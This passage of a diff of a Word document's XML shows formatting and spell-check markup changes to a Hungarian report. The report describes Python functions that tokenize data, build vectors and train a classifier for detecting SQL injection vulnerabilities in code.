-        <w:t xml:space="preserve">ukkal a </w:t>
-      </w:r>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.oszlopának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sorait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, szóköz alapján szétválasztja </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sorozato</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az egyes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokeneket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>előfordulási szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ukkal a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16901,7 +18956,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja </w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>collection.Counter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> típusából adódóan biztosítja </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16930,11 +18999,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createLookupTables: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createLookupTables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16984,6 +19061,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> készít a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16992,12 +19070,21 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tokenjeinek</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokenjeinek</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17057,11 +19144,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createVectors: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createVectors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17081,123 +19176,91 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.oszlopának </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">étdarabolt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tokenjein</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, és a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">keresőtábla alapján a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hozzájuk tartozó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">indexet </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
-      </w:r>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">X </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>listázza</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Amennyiben </w:t>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.oszlopának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">étdarabolt </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokenjein</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, és a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">keresőtábla alapján a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">indexet </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17211,6 +19274,50 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>listázza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>X</w:t>
       </w:r>
       <w:r>
@@ -17232,63 +19339,83 @@
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">kevesebb, mint a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">max_length </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">értéke, a különbséget nullákkal tölti fel. Ha a hossza nagyobb, a különbséget levágja a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>lista</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> végéről. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Így</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a vektorok hossza egységes marad.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Másrészt a </w:t>
-      </w:r>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">értéke, a különbséget nullákkal tölti fel. Ha a hossza nagyobb, a különbséget levágja a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lista</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> végéről. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Így</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a vektorok hossza egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17608,11 +19735,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">saveVectorAs: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>saveVectorAs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17648,6 +19783,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> változókat lementi egy-egy </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17658,7 +19794,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>py fájlba.</w:t>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlba.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17711,8 +19854,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-on</w:t>
-      </w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17797,7 +19948,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
+        <w:t xml:space="preserve">kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injectionbeli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17872,7 +20039,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a „toimpor</w:t>
+        <w:t>a „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toimpor</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17880,11 +20054,26 @@
         </w:rPr>
         <w:t>tX</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>” numpy fáj</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fáj</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17926,7 +20115,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„test</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>test</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17934,6 +20130,7 @@
         </w:rPr>
         <w:t>X</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17944,7 +20141,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> „testy”</w:t>
+        <w:t xml:space="preserve"> „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>testy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17952,6 +20163,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17968,7 +20180,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>y fájlokat</w:t>
+        <w:t>y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18000,48 +20219,88 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trainX, train</w:t>
-      </w:r>
+        <w:t>trainX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Y</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és tesztelésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>testX, testY</w:t>
-      </w:r>
+        <w:t>train</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és tesztelésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>testX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>testY</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18102,12 +20361,14 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>classifier</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18219,12 +20480,20 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">test_bmodel: </w:t>
+        <w:t>test_bmodel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18302,7 +20571,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Confusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Matrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Recall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18343,11 +20654,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier:</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18359,7 +20678,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a paraméterben megadott tanító és tesztelő adatok alapján képzi és értékeli ki a szintén paraméterbeli osztályozót.</w:t>
+        <w:t xml:space="preserve">a paraméterben megadott tanító és tesztelő adatok alapján képzi és értékeli ki a szintén </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>paraméterbeli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztályozót.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18377,7 +20710,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> test_bmodel által visszaadott metrika</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>test_bmodel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> által visszaadott metrika</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18389,7 +20736,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a ciklus hanyadik futásnál jár</w:t>
+        <w:t xml:space="preserve">a ciklus </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hanyadik</w:t>
+      </w:r>
